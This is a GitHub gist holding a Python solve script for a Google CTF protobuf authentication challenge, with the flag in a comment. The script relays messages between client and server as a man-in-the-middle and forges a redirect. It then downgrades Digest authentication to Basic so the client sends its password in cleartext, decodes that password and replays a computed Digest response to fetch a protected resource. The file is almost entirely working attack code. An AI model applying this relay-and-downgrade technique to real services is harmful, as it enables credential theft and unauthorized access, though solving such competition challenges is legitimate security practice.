Created
May 2, 2016 10:57
-
-
Save CreateRemoteThread/7bc512785c842e474e550d541e2c2542 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
# CTF{golang_reversing_can_eat_my_balls_and_so_can_protocol_buffers} | |
try: | |
import hashlib as md5 | |
except ImportError: | |
import md5 | |
import random | |
import types | |
import dicks | |
import sys | |
import base64 | |
import opabina_pb2 | |
import struct | |
import socket | |
import ssl | |
# TEST BUILDING AUTH CHALLENGE | |
# TEST_AUTHSTRING = "Digest realm=\"testrealm@host.com\",qop=\"auth\",nonce=\"dd3b173f21ae8266\",opaque=\"dd3b173f21ae8266\"" | |
# HERPADERP | |
#partial_digest = dicks.calculate_partial_digest("google.ctf","In the realm of hackers","1932403934.1443610966.703716842") | |
#request_digest = dicks.calculate_request_digest("GET",partial_digest,uri="/protected/secret",nonce="dcd98b7102dd2f0e8b11d0f600bfb0c093",nonce_count=1,client_nonce="0a4f113b") | |
#print request_digest | |
#print "6629fae49393a05397450978507c4ef1" | |
# print "DW ABOUT THE ABOVE JUST TESTING LOL" | |
partial_digest = "" | |
request_digest = "" | |
HOST="ssl-added-and-removed-here.ctfcompetition.com" | |
PORT=13001 | |
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
sock.settimeout(10) | |
wrappedSocket = ssl.wrap_socket(sock) | |
wrappedSocket.connect((HOST,PORT)) | |
def nice_recv(ws): | |
d = ws.recv(1024) | |
l = struct.unpack("<i",d[0:4]) | |
pb = opabina_pb2.Exchange() | |
pb.ParseFromString(d[4:]) | |
print pb | |
return pb | |
# d = wrappedSocket.recv(1024) | |
# print d | |
# length_marshalled = struct.unpack("<i",d[0:4]) | |
# print length_marshalled | |
# pb = opabina_pb2.Exchange() | |
# pb.ParseFromString(d[4:]) | |
# print "-- RECEIVED %d --" % len(d) | |
# rint pb | |
nice_recv(wrappedSocket) | |
# del pb | |
print "-- CREATING RESPONSE --" | |
def nice_send(s,data): | |
d = data.SerializeToString() | |
l = struct.pack("<i",len(d)) | |
s.send(l+d) | |
pb = opabina_pb2.Exchange() | |
pb.request.ver = 0 | |
pb.request.uri = "/protected/not-secret" | |
h = pb.request.headers.add() | |
h.key = "User-Agent" | |
h.value = "opabina-regalis.go" | |
# hv = pb.request.headers.add() | |
# hv.key = "Host" | |
# hv.value = "localhost" | |
print "SENDING SERVER REQUEST FOR /PROTECTED/NOT-SECRET" | |
nice_send(wrappedSocket,pb) | |
print "RECEIVING...." | |
pb = nice_recv(wrappedSocket) | |
print "FORWARDING SERVER->CLIENT AUTHENTICATION REQUEST..." | |
nice_send(wrappedSocket,pb) | |
pb = nice_recv(wrappedSocket) | |
print "FORWARDING CLIENT->SERVER AUTHENTICATION REQUEST..." | |
nice_send(wrappedSocket,pb) | |
pb = nice_recv(wrappedSocket) | |
print "THIS ISNT THE TOKEN YOURE LOOKING FOR..." | |
pb = opabina_pb2.Exchange() | |
pb.reply.status = 302 | |
h = pb.reply.headers.add() | |
h.key = "Location" | |
h.value = "/protected/secret" | |
print "REDIRECTING USER TO /PROTECTED/SECRET, YOU SHOULD SEE A GET REQUEST..." | |
nice_send(wrappedSocket,pb) | |
pb = nice_recv(wrappedSocket) | |
nice_send(wrappedSocket,pb) | |
print "AUTH REQUEST NEXT?" | |
pb = nice_recv(wrappedSocket) | |
nice_send(wrappedSocket,pb) | |
pb = nice_recv(wrappedSocket) | |
nice_send(wrappedSocket,pb) | |
pb = nice_recv(wrappedSocket) | |
sys.exit(0) | |
rnonce="" | |
request_digest = "" | |
for h in pb.reply.headers: | |
if h.key == "WWW-Authenticate": | |
print "+++ DIGEST AUTH: %s" % h.value | |
import re | |
m = re.search("nonce=\"(.+?)\"",h.value) | |
print "+++ MATCH: %s" % m.groups(0) | |
(rnoncex,) = m.groups(0) | |
rnonce=rnoncex | |
# sys.exit(0) | |
print "-- DOWNGRADING TO FORCE BASIC HEADER" | |
pb = opabina_pb2.Exchange() | |
pb.reply.status=401 | |
h = pb.reply.headers.add() | |
h.key = "Server" | |
h.value = "opabina-regalis.go" | |
h_loc = pb.reply.headers.add() | |
h_loc.key = "Location" | |
h_loc.value = "/protected/secret" | |
h2 = pb.reply.headers.add() | |
h2.key = "WWW-Authenticate" | |
h2.value = "Basic realm=\"In the realm of hackers\"" | |
nice_send(wrappedSocket,pb) | |
print "RECEIVING...." | |
d = wrappedSocket.recv(1024) | |
length_marshalled = struct.unpack("<i",d[0:4]) | |
print length_marshalled | |
del pb | |
pb = opabina_pb2.Exchange() | |
pb.ParseFromString(d[4:]) | |
print pb | |
for h in pb.request.headers: | |
if h.key == "Authorization": | |
b = h.value | |
(basic,authb64) = b.split(" ") | |
(user,pw) = base64.b64decode(authb64).split(":") | |
print "USER:%s PW:%s" % (user,pw) | |
# sys.exit(0) | |
partial_digest = dicks.calculate_partial_digest("google.ctf","In the realm of hackers",pw) | |
request_digest = dicks.calculate_request_digest("GET",partial_digest,uri="/protected/secret",nonce=rnonce,nonce_count=1,client_nonce="0a4f113b") | |
print "-- REPLYING WITH AUTHENTICATION VALUE --" | |
pb = opabina_pb2.Exchange() | |
pb.request.ver = 0 | |
pb.request.uri = "/protected/secret" | |
h = pb.request.headers.add() | |
h.key = "User-Agent" | |
h.value = "opabina-regalis.go" | |
h_auth = pb.request.headers.add() | |
h_auth.key = "Authorization" | |
h_auth.value = "Digest username=\"google.ctf\",realm=\"In the realm of hackers\",nonce=\"" + rnonce + "\",uri=\"/protected/secret\",qop=auth,nc=00000001,cnonce=\"0a4f113b\",response=\""+request_digest+"\",opaque=\""+request_digest + "\"" | |
print pb | |
nice_send(wrappedSocket,pb) | |
print "RECEIVING...." | |
d = wrappedSocket.recv(1024) | |
length_marshalled = struct.unpack("<i",d[0:4]) | |
print length_marshalled | |
del pb | |
pb = opabina_pb2.Exchange() | |
pb.ParseFromString(d[4:]) | |
print pb | |
wrappedSocket.close() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment